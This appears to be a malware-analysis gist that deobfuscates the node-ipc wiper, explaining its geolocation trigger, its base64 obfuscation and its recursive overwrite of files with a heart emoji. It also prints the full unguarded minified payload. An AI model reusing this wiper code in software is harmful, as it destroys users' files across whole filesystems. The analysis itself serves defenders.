@jerbear2008
Last active March 18, 2022 04:23
Deobfuscating the node-ipc virus.
/* for safety reasons: */ process.exit(1) //not in original payload: analyst-inserted guard so this file halts if it is ever executed
import path from "path"
import fs from "fs"
import https from "https"
// Stage 1: delayed, probabilistic trigger. The only network activity is one HTTPS GET to
// api.ipgeolocation.io (the egress indicator to look for); the wiper only runs on a matching country.
setTimeout(function() { //check location, if so activate payload
/* for safety reasons: */ process.exit(1) //not in original payload
const randomNum = Math.round(Math.random() * 4) //0..4; only 0 or 1 continue (roughly 3 in 8 runs), otherwise the payload silently does nothing
if (randomNum > 1) {
return
}
const geoLocationIP = 'https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154' //third-party API key hard-coded into the shipped package
https.get(geoLocationIP, function(response) { //fetch geolocation
response.on("data", function(data) { //runs once per response chunk; a body split across chunks would likely fail JSON.parse and be swallowed below
try { //process response
const json = JSON.parse(data.toString("utf8"))
const country = json.country_name.toLowerCase()
const isTarget = country.includes('russia') || country.includes('belarus')
if (isTarget) { //if russia or belarus, overwrite: starts at cwd, then one and two parents up, then the filesystem root
overwrite('./')
overwrite('../')
overwrite('../../')
overwrite('/')
}
} catch (err) {} //parse failure or missing country_name is swallowed, so the payload fails silently
})
})
}, Math.ceil(Math.random() * 1e3)) //delay is 1–1000 milliseconds (setTimeout takes ms), not seconds as the original note said
// Stage 2: recursive wiper. Walks `folder` depth-first and replaces the contents of every non-directory
// entry with a heart emoji. Files whose entire content is that 6-byte UTF-8 sequence are the forensic indicator.
// The returned array is always empty in practice (see the recursion note below); callers ignore it anyway.
async function overwrite(folder = '') {
/* for safety reasons: */ process.exit(1) //not in original payload
if (!fs.existsSync(folder)) { //if folder does not exist, stop
return
}
let contents = []
try {
contents = fs.readdirSync(folder) //get contents of folder
} catch (err) {} //unreadable directory is treated as empty
const foldersOverwritten = []
for (var i = 0; i < contents.length; i++) { //iterate over files
const pathToCheck = path.join(folder, contents[i]) //get path of file
let file = null
try {
file = fs.lstatSync(pathToCheck) //get file
} catch (err) {
continue
}
if (file.isDirectory()) { //if directory, recurse
const result = overwrite(pathToCheck) //not awaited: `result` is a Promise, but the function contains no await, so the recursive body still runs to completion synchronously
result.length > 0 ? foldersOverwritten.push(...result) : null //a Promise has no `length`, so nothing is ever pushed
} else if (pathToCheck.indexOf('') >= 0) { //always true: the minified original's second parameter (a path filter) was inlined here as ''
try {
fs.writeFile(pathToCheck, '❤️', function() {}) //overwrite file! asynchronous write; the no-op callback discards any error
} catch (err) {}
}
}
return foldersOverwritten
}
//disguised as ssl checker: the only exported value is a constant, so importing this module
//appears inert while the timer scheduled above is the actual effect
const ssl = true
export {
ssl as
default, ssl
}
/* for safety reasons: */ process.exit(1) //not in original payload
// Minified original as shipped. Every string constant is base64-encoded (the API URL, the four start
// paths, "country_name", "russia", "belarus", and the heart emoji). h() is overwrite() above; note its
// second parameter o (a path filter, default "") which the readable version inlines as ''.
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}